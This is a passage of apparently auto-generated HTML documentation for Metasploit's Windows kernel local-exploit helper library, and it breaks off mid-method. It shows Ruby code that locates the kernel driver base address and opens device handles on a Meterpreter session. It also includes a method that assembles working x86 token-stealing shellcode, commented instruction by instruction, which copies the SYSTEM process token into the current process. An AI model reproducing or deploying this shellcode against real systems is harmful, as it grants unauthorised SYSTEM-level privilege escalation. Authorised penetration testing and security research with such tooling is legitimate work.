<span class='kw'>unless</span> <span class='id identifier rubyid_results'>results</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>return</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span>
<span class='id identifier rubyid_print_error'>print_error</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>EnumDeviceDrivers failed (error: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_results'>results</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>GetLastError</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='embexpr_end'>}</span><span class='tstring_content'> </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_results'>results</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>ErrorMessage</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='embexpr_end'>}</span><span class='tstring_content'>)</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>return</span> <span class='kw'>nil</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_results'>results</span> <span class='op'>=</span> <span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_railgun'>railgun</span><span class='period'>.</span><span class='id identifier rubyid_psapi'>psapi</span><span class='period'>.</span><span class='const'>EnumDeviceDrivers</span><span class='lparen'>(</span><span class='id identifier rubyid_results'>results</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>lpcbNeeded</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='comma'>,</span> <span class='id identifier rubyid_results'>results</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>lpcbNeeded</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='comma'>,</span> <span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_railgun'>railgun</span><span class='period'>.</span><span class='id identifier rubyid_util'>util</span><span class='period'>.</span><span class='id identifier rubyid_pointer_size'>pointer_size</span><span class='rparen'>)</span>
<span class='kw'>unless</span> <span class='id identifier rubyid_results'>results</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>return</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span>
<span class='id identifier rubyid_print_error'>print_error</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>EnumDeviceDrivers failed (error: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_results'>results</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>GetLastError</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='embexpr_end'>}</span><span class='tstring_content'> </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_results'>results</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>ErrorMessage</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='embexpr_end'>}</span><span class='tstring_content'>)</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>return</span> <span class='kw'>nil</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_addresses'>addresses</span> <span class='op'>=</span> <span class='id identifier rubyid_results'>results</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>lpImageBase</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='lbracket'>[</span><span class='int'>0</span><span class='op'>..</span><span class='id identifier rubyid_results'>results</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>lpcbNeeded</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='op'>-</span> <span class='int'>1</span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_unpack'>unpack</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_ptr'>ptr</span><span class='embexpr_end'>}</span><span class='tstring_content'>*</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_addresses'>addresses</span><span class='period'>.</span><span class='id identifier rubyid_each'>each</span> <span class='kw'>do</span> <span class='op'>|</span><span class='id identifier rubyid_address'>address</span><span class='op'>|</span>
<span class='id identifier rubyid_results'>results</span> <span class='op'>=</span> <span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_railgun'>railgun</span><span class='period'>.</span><span class='id identifier rubyid_psapi'>psapi</span><span class='period'>.</span><span class='const'>GetDeviceDriverBaseNameA</span><span class='lparen'>(</span><span class='id identifier rubyid_address'>address</span><span class='comma'>,</span> <span class='int'>48</span><span class='comma'>,</span> <span class='int'>48</span><span class='rparen'>)</span>
<span class='kw'>if</span> <span class='id identifier rubyid_results'>results</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>return</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='op'>==</span> <span class='int'>0</span>
<span class='id identifier rubyid_print_error'>print_error</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>GetDeviceDriverBaseNameA failed (error: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_results'>results</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>GetLastError</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='embexpr_end'>}</span><span class='tstring_content'> </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_results'>results</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>ErrorMessage</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='embexpr_end'>}</span><span class='tstring_content'>)</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>return</span> <span class='kw'>nil</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_current_drvname'>current_drvname</span> <span class='op'>=</span> <span class='id identifier rubyid_results'>results</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>lpBaseName</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='lbracket'>[</span><span class='int'>0</span><span class='comma'>,</span><span class='id identifier rubyid_results'>results</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>return</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='rbracket'>]</span>
<span class='kw'>if</span> <span class='id identifier rubyid_drvname'>drvname</span><span class='period'>.</span><span class='id identifier rubyid_nil?'>nil?</span>
<span class='kw'>if</span> <span class='id identifier rubyid_current_drvname'>current_drvname</span><span class='period'>.</span><span class='id identifier rubyid_downcase'>downcase</span><span class='period'>.</span><span class='id identifier rubyid_include?'>include?</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>krnl</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='kw'>return</span> <span class='id identifier rubyid_address'>address</span><span class='comma'>,</span> <span class='id identifier rubyid_current_drvname'>current_drvname</span>
<span class='kw'>end</span>
<span class='kw'>elsif</span> <span class='id identifier rubyid_drvname'>drvname</span> <span class='op'>==</span> <span class='id identifier rubyid_current_drvname'>current_drvname</span>
<span class='kw'>return</span> <span class='id identifier rubyid_address'>address</span><span class='comma'>,</span> <span class='id identifier rubyid_current_drvname'>current_drvname</span>
<span class='kw'>end</span>
<span class='kw'>end</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="initialize-instance_method">
#<strong>initialize</strong>(info = {}) &#x21d2; <tt>Object</tt>
</h3><table class="source_code">
<tr>
<td>
<pre class="lines">
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/local/windows_kernel.rb', line 8</span>
<span class='kw'>def</span> <span class='id identifier rubyid_initialize'>initialize</span><span class='lparen'>(</span><span class='id identifier rubyid_info'>info</span> <span class='op'>=</span> <span class='lbrace'>{</span><span class='rbrace'>}</span><span class='rparen'>)</span>
<span class='kw'>super</span><span class='lparen'>(</span>
<span class='id identifier rubyid_update_info'>update_info</span><span class='lparen'>(</span>
<span class='id identifier rubyid_info'>info</span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Compat</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='lbrace'>{</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Meterpreter</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='lbrace'>{</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Commands</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='qwords_beg'>%w[</span><span class='words_sep'>
</span><span class='tstring_content'>stdapi_railgun_api</span><span class='words_sep'>
</span><span class='tstring_content'>stdapi_railgun_memread</span><span class='words_sep'>
</span><span class='tstring_content'>stdapi_railgun_memwrite</span><span class='words_sep'>
</span><span class='tstring_end'>]</span></span>
<span class='rbrace'>}</span>
<span class='rbrace'>}</span>
<span class='rparen'>)</span>
<span class='rparen'>)</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="open_device-instance_method">
#<strong>open_device</strong>(file_name, desired_access, share_mode, creation_disposition, flags_and_attributes = 0) &#x21d2; <tt>Integer</tt><sup>?</sup>
</h3><div class="docstring">
<div class="discussion">
<p>Open a device on a meterpreter session with a call to CreateFileA and return the handle. Both optional parameters lpSecurityAttributes and hTemplateFile are specified as nil.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>file_name</span>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>Passed to CreateFileA as the lpFileName parameter.</p>
</div>
</li>
<li>
<span class='name'>desired_access</span>
<span class='type'>(<tt>String</tt>, <tt>Integer</tt>)</span>
&mdash;
<div class='inline'>
<p>Passed to CreateFileA as the dwDesiredAccess parameter.</p>
</div>
</li>
<li>
<span class='name'>share_mode</span>
<span class='type'>(<tt>String</tt>, <tt>Integer</tt>)</span>
&mdash;
<div class='inline'>
<p>Passed to CreateFileA as the dwShareMode parameter.</p>
</div>
</li>
<li>
<span class='name'>creation_disposition</span>
<span class='type'>(<tt>String</tt>, <tt>Integer</tt>)</span>
&mdash;
<div class='inline'>
<p>Passed to CreateFileA as the dwCreationDisposition parameter.</p>
</div>
</li>
<li>
<span class='name'>flags_and_attributes</span>
<span class='type'>(<tt>String</tt>, <tt>Integer</tt>)</span>
<em class="default">(defaults to: <tt>0</tt>)</em>
&mdash;
<div class='inline'>
<p>Passed to CreateFileA as the dwFlagsAndAttributes parameter.</p>
</div>
</li>
</ul>
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>Integer</tt>)</span>
&mdash;
<div class='inline'>
<p>The device handle.</p>
</div>
</li>
<li>
<span class='type'>(<tt>nil</tt>)</span>
&mdash;
<div class='inline'>
<p>If the call to CreateFileA failed.</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
116
117
118
119
120
121
122
123</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/local/windows_kernel.rb', line 116</span>
<span class='kw'>def</span> <span class='id identifier rubyid_open_device'>open_device</span><span class='lparen'>(</span><span class='id identifier rubyid_file_name'>file_name</span><span class='comma'>,</span> <span class='id identifier rubyid_desired_access'>desired_access</span><span class='comma'>,</span> <span class='id identifier rubyid_share_mode'>share_mode</span><span class='comma'>,</span> <span class='id identifier rubyid_creation_disposition'>creation_disposition</span><span class='comma'>,</span> <span class='id identifier rubyid_flags_and_attributes'>flags_and_attributes</span> <span class='op'>=</span> <span class='int'>0</span><span class='rparen'>)</span>
<span class='id identifier rubyid_handle'>handle</span> <span class='op'>=</span> <span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_railgun'>railgun</span><span class='period'>.</span><span class='id identifier rubyid_kernel32'>kernel32</span><span class='period'>.</span><span class='const'>CreateFileA</span><span class='lparen'>(</span><span class='id identifier rubyid_file_name'>file_name</span><span class='comma'>,</span> <span class='id identifier rubyid_desired_access'>desired_access</span><span class='comma'>,</span> <span class='id identifier rubyid_share_mode'>share_mode</span><span class='comma'>,</span> <span class='kw'>nil</span><span class='comma'>,</span> <span class='id identifier rubyid_creation_disposition'>creation_disposition</span><span class='comma'>,</span> <span class='id identifier rubyid_flags_and_attributes'>flags_and_attributes</span><span class='comma'>,</span> <span class='kw'>nil</span><span class='rparen'>)</span>
<span class='kw'>if</span> <span class='id identifier rubyid_handle'>handle</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>return</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='op'>==</span> <span class='const'><span class='object_link'><a href="../../Post/Windows/Error.html#INVALID_HANDLE_VALUE-constant" title="Msf::Post::Windows::Error::INVALID_HANDLE_VALUE (constant)">INVALID_HANDLE_VALUE</a></span></span>
<span class='id identifier rubyid_print_error'>print_error</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Failed to open the </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_file_name'>file_name</span><span class='embexpr_end'>}</span><span class='tstring_content'> device (error: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_handle'>handle</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>GetLastError</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='embexpr_end'>}</span><span class='tstring_content'> </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_handle'>handle</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>ErrorMessage</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='embexpr_end'>}</span><span class='tstring_content'>)</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>return</span> <span class='kw'>nil</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_handle'>handle</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>return</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="token_stealing_shellcode-instance_method">
#<strong>token_stealing_shellcode</strong>(target, backup_token = nil, arch = nil, append_ret = true) &#x21d2; <tt>String</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Generate token stealing shellcode suitable for use when overwriting the HaliQuerySystemInformation pointer. The shellcode preserves the edx and ebx registers.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>target</span>
<span class='type'>(<tt>Hash</tt>)</span>
&mdash;
<div class='inline'>
<p>The target information containing the offsets to _KPROCESS, _TOKEN, _UPID and _APLINKS.</p>
</div>
</li>
<li>
<span class='name'>backup_token</span>
<span class='type'>(<tt>Integer</tt>)</span>
<em class="default">(defaults to: <tt>nil</tt>)</em>
&mdash;
<div class='inline'>
<p>An optional location to write a copy of the original token to so it can be restored later.</p>
</div>
</li>
<li>
<span class='name'>arch</span>
<span class='type'>(<tt>String</tt>)</span>
<em class="default">(defaults to: <tt>nil</tt>)</em>
&mdash;
<div class='inline'>
<p>The architecture to return shellcode for. If this is nil, the arch will be guessed from the target and then module information.</p>
</div>
</li>
<li>
<span class='name'>append_ret</span>
<span class='type'>(<tt>Boolean</tt>)</span>
<em class="default">(defaults to: <tt>true</tt>)</em>
&mdash;
<div class='inline'>
<p>Append a ret instruction for use when being called in place of HaliQuerySystemInformation.</p>
</div>
</li>
</ul>
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>The token stealing shellcode.</p>
</div>
</li>
</ul>
<p class="tag_title">Raises:</p>
<ul class="raise">
<li>
<span class='type'>(<tt>ArgumentError</tt>)</span>
&mdash;
<div class='inline'>
<p>If the arch is incompatible.</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/local/windows_kernel.rb', line 141</span>
<span class='kw'>def</span> <span class='id identifier rubyid_token_stealing_shellcode'>token_stealing_shellcode</span><span class='lparen'>(</span><span class='id identifier rubyid_target'>target</span><span class='comma'>,</span> <span class='id identifier rubyid_backup_token'>backup_token</span> <span class='op'>=</span> <span class='kw'>nil</span><span class='comma'>,</span> <span class='id identifier rubyid_arch'>arch</span> <span class='op'>=</span> <span class='kw'>nil</span><span class='comma'>,</span> <span class='id identifier rubyid_append_ret'>append_ret</span> <span class='op'>=</span> <span class='kw'>true</span><span class='rparen'>)</span>
<span class='id identifier rubyid_arch'>arch</span> <span class='op'>=</span> <span class='id identifier rubyid_target'>target</span><span class='period'>.</span><span class='id identifier rubyid_opts'>opts</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Arch</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='kw'>if</span> <span class='id identifier rubyid_arch'>arch</span><span class='period'>.</span><span class='id identifier rubyid_nil?'>nil?</span> <span class='op'>&amp;&amp;</span> <span class='id identifier rubyid_target'>target</span> <span class='op'>&amp;&amp;</span> <span class='id identifier rubyid_target'>target</span><span class='period'>.</span><span class='id identifier rubyid_opts'>opts</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Arch</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span>
<span class='kw'>if</span> <span class='id identifier rubyid_arch'>arch</span><span class='period'>.</span><span class='id identifier rubyid_nil?'>nil?</span> <span class='op'>&amp;&amp;</span> <span class='id identifier rubyid_module_info'>module_info</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Arch</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span>
<span class='id identifier rubyid_arch'>arch</span> <span class='op'>=</span> <span class='id identifier rubyid_module_info'>module_info</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Arch</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span>
<span class='id identifier rubyid_arch'>arch</span> <span class='op'>=</span> <span class='id identifier rubyid_arch'>arch</span><span class='lbracket'>[</span><span class='int'>0</span><span class='rbracket'>]</span> <span class='kw'>if</span> <span class='id identifier rubyid_arch'>arch</span><span class='period'>.</span><span class='id identifier rubyid_is_a?'>is_a?</span><span class='lparen'>(</span><span class='const'>Array</span><span class='rparen'>)</span> <span class='kw'>and</span> <span class='id identifier rubyid_arch'>arch</span><span class='period'>.</span><span class='id identifier rubyid_length'>length</span> <span class='op'>==</span> <span class='int'>1</span>
<span class='kw'>end</span>
<span class='kw'>if</span> <span class='id identifier rubyid_arch'>arch</span><span class='period'>.</span><span class='id identifier rubyid_nil?'>nil?</span>
<span class='id identifier rubyid_print_error'>print_error</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Can not determine the target architecture</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_fail'>fail</span> <span class='const'>ArgumentError</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Invalid arch</span><span class='tstring_end'>&#39;</span></span>
<span class='kw'>end</span>
<span class='id identifier rubyid_tokenstealing'>tokenstealing</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_end'>&#39;</span></span>
<span class='kw'>case</span> <span class='id identifier rubyid_arch'>arch</span>
<span class='kw'>when</span> <span class='const'>ARCH_X86</span>
<span class='id identifier rubyid_tokenstealing'>tokenstealing</span> <span class='op'>&lt;&lt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>\x52</span><span class='tstring_end'>&quot;</span></span> <span class='comment'># push edx # Save edx on the stack
</span> <span class='id identifier rubyid_tokenstealing'>tokenstealing</span> <span class='op'>&lt;&lt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>\x53</span><span class='tstring_end'>&quot;</span></span> <span class='comment'># push ebx # Save ebx on the stack
</span> <span class='id identifier rubyid_tokenstealing'>tokenstealing</span> <span class='op'>&lt;&lt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>\x33\xc0</span><span class='tstring_end'>&quot;</span></span> <span class='comment'># xor eax, eax # eax = 0
</span> <span class='id identifier rubyid_tokenstealing'>tokenstealing</span> <span class='op'>&lt;&lt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>\x64\x8b\x80\x24\x01\x00\x00</span><span class='tstring_end'>&quot;</span></span> <span class='comment'># mov eax, dword ptr fs:[eax+124h] # Retrieve ETHREAD
</span> <span class='id identifier rubyid_tokenstealing'>tokenstealing</span> <span class='op'>&lt;&lt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>\x8b\x40</span><span class='tstring_end'>&quot;</span></span> <span class='op'>+</span> <span class='id identifier rubyid_target'>target</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>_KPROCESS</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='comment'># mov eax, dword ptr [eax+44h] # Retrieve _KPROCESS
</span> <span class='id identifier rubyid_tokenstealing'>tokenstealing</span> <span class='op'>&lt;&lt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>\x8b\xc8</span><span class='tstring_end'>&quot;</span></span> <span class='comment'># mov ecx, eax
</span> <span class='id identifier rubyid_tokenstealing'>tokenstealing</span> <span class='op'>&lt;&lt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>\x8b\x98</span><span class='tstring_end'>&quot;</span></span> <span class='op'>+</span> <span class='id identifier rubyid_target'>target</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>_TOKEN</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='op'>+</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>\x00\x00\x00</span><span class='tstring_end'>&quot;</span></span> <span class='comment'># mov ebx, dword ptr [eax+0C8h] # Retrieves TOKEN
</span> <span class='kw'>unless</span> <span class='id identifier rubyid_backup_token'>backup_token</span><span class='period'>.</span><span class='id identifier rubyid_nil?'>nil?</span>
<span class='id identifier rubyid_tokenstealing'>tokenstealing</span> <span class='op'>&lt;&lt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>\x89\x1d</span><span class='tstring_end'>&quot;</span></span> <span class='op'>+</span> <span class='lbracket'>[</span><span class='id identifier rubyid_backup_token'>backup_token</span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_pack'>pack</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>V</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span> <span class='comment'># mov dword ptr ds:backup_token, ebx # Optionally write a copy of the token to the address provided
</span> <span class='kw'>end</span>
<span class='id identifier rubyid_tokenstealing'>tokenstealing</span> <span class='op'>&lt;&lt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>\x8b\x80</span><span class='tstring_end'>&quot;</span></span> <span class='op'>+</span> <span class='id identifier rubyid_target'>target</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>_APLINKS</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='op'>+</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>\x00\x00\x00</span><span class='tstring_end'>&quot;</span></span> <span class='comment'># mov eax, dword ptr [eax+88h] &lt;====| # Retrieve FLINK from ActiveProcessLinks
</span> <span class='id identifier rubyid_tokenstealing'>tokenstealing</span> <span class='op'>&lt;&lt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>\x81\xe8</span><span class='tstring_end'>&quot;</span></span> <span class='op'>+</span> <span class='id identifier rubyid_target'>target</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>_APLINKS</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='op'>+</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>\x00\x00\x00</span><span class='tstring_end'>&quot;</span></span> <span class='comment'># sub eax, 88h | # Retrieve _EPROCESS Pointer from the ActiveProcessLinks
</span> <span class='id identifier rubyid_tokenstealing'>tokenstealing</span> <span class='op'>&lt;&lt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>\x81\xb8</span><span class='tstring_end'>&quot;</span></span> <span class='op'>+</span> <span class='id identifier rubyid_target'>target</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>_UPID</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='op'>+</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>\x00\x00\x00\x04\x00\x00\x00</span><span class='tstring_end'>&quot;</span></span> <span class='comment'># cmp dword ptr [eax+84h], 4 | # Compares UniqueProcessId with 4 (The System Process on Windows XP)
</span> <span class='id identifier rubyid_tokenstealing'>tokenstealing</span> <span class='op'>&lt;&lt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>\x75\xe8</span><span class='tstring_end'>&quot;</span></span> <span class='comment'># jne 0000101e ======================|
</span> <span class='id identifier rubyid_tokenstealing'>tokenstealing</span> <span class='op'>&lt;&lt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>\x8b\x90</span><span class='tstring_end'>&quot;</span></span> <span class='op'>+</span> <span class='id identifier rubyid_target'>target</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>_TOKEN</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='op'>+</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>\x00\x00\x00</span><span class='tstring_end'>&quot;</span></span> <span class='comment'># mov edx, dword ptr [eax+0C8h] # Retrieves TOKEN and stores on EDX
</span> <span class='id identifier rubyid_tokenstealing'>tokenstealing</span> <span class='op'>&lt;&lt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>\x8b\xc1</span><span class='tstring_end'>&quot;</span></span> <span class='comment'># mov eax, ecx # Retrieves KPROCESS stored on ECX
</span> <span class='id identifier rubyid_tokenstealing'>tokenstealing</span> <span class='op'>&lt;&lt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>\x89\x90</span><span class='tstring_end'>&quot;</span></span> <span class='op'>+</span> <span class='id identifier rubyid_target'>target</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>_TOKEN</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='op'>+</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>\x00\x00\x00</span><span class='tstring_end'>&quot;</span></span> <span class='comment'># mov dword ptr [eax+0C8h],edx # Overwrites the TOKEN for the current KPROCESS
</span> <span class='id identifier rubyid_tokenstealing'>tokenstealing</span> <span class='op'>&lt;&lt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>\x5b</span><span class='tstring_end'>&quot;</span></span> <span class='comment'># pop ebx # Restores ebx
</span> <span class='id identifier rubyid_tokenstealing'>tokenstealing</span> <span class='op'>&lt;&lt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>\x5a</span><span class='tstring_end'>&quot;</span></span> <span class='comment'># pop edx # Restores edx
</span> <span class='kw'>if</span> <span class='id identifier rubyid_append_ret'>append_ret</span>
<span class='id identifier rubyid_tokenstealing'>tokenstealing</span> <span class='op'>&lt;&lt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>\xc2\x10</span><span class='tstring_end'>&quot;</span></span> <span class='comment'># ret 10h # Away from the kernel!
</span> <span class='kw'>end</span>
<span class='kw'>else</span>
<span class='comment'># if this is reached the issue most likely exists in the exploit module
